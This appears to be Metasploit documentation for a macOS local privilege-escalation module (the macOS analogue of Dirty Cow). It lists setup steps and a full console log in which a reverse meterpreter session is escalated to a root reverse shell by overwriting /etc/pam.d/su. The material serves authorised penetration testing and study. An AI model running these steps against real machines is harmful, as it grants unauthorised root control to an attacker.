CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/osx/local/mac_dirty_cow.md
Views: 11655

Vulnerable Application

This vulnerability works against macOS 13.0.1 - 13.0 and macOS 12.6.1 - 10.15. This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root.

Verification Steps

  1. Start msfconsole.

  2. Do: use multi/handler.

  3. Set the RHOST, PAYLOAD options.

  4. Do: run.

  5. Execute the payload on the machine and obtain a user session.

  6. Do: use exploit/osx/local/mac_dirty_cow

  7. Set the SESSION, LHOST, LPORT options.

  8. Do: run.

  9. Receive a shell session as the root user.

Scenarios

Mac OSX (Venture 13.0)

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload osx/x64/meterpreter/reverse_tcp
payload => osx/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:49801) at 2023-02-01 16:10:14 -0500

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/osx/local/mac_dirty_cow
[*] Using exploit/osx/local/mac_dirty_cow
msf6 exploit(osx/local/mac_dirty_cow) > set session 1
session => 1
msf6 exploit(osx/local/mac_dirty_cow) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(osx/local/mac_dirty_cow) > set lport 4446
lport => 4446
msf6 exploit(osx/local/mac_dirty_cow) > run

[*] Started reverse TCP handler on 172.16.199.1:4446
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.wNDx86' (17204 bytes) ...
[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ...
[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[*] Running cmd:
echo '/tmp/.wNDx86 & disown' | su
[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[+] Deleted /tmp/.wNDx86
[+] Deleted /tmp/.aclP0u
[+] Deleted /tmp/.DfoZanro
[+] Deleted /tmp/.TKIGnTw0l
[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500

options
/bin/sh: line 29: options: command not found
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
uname -a
Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64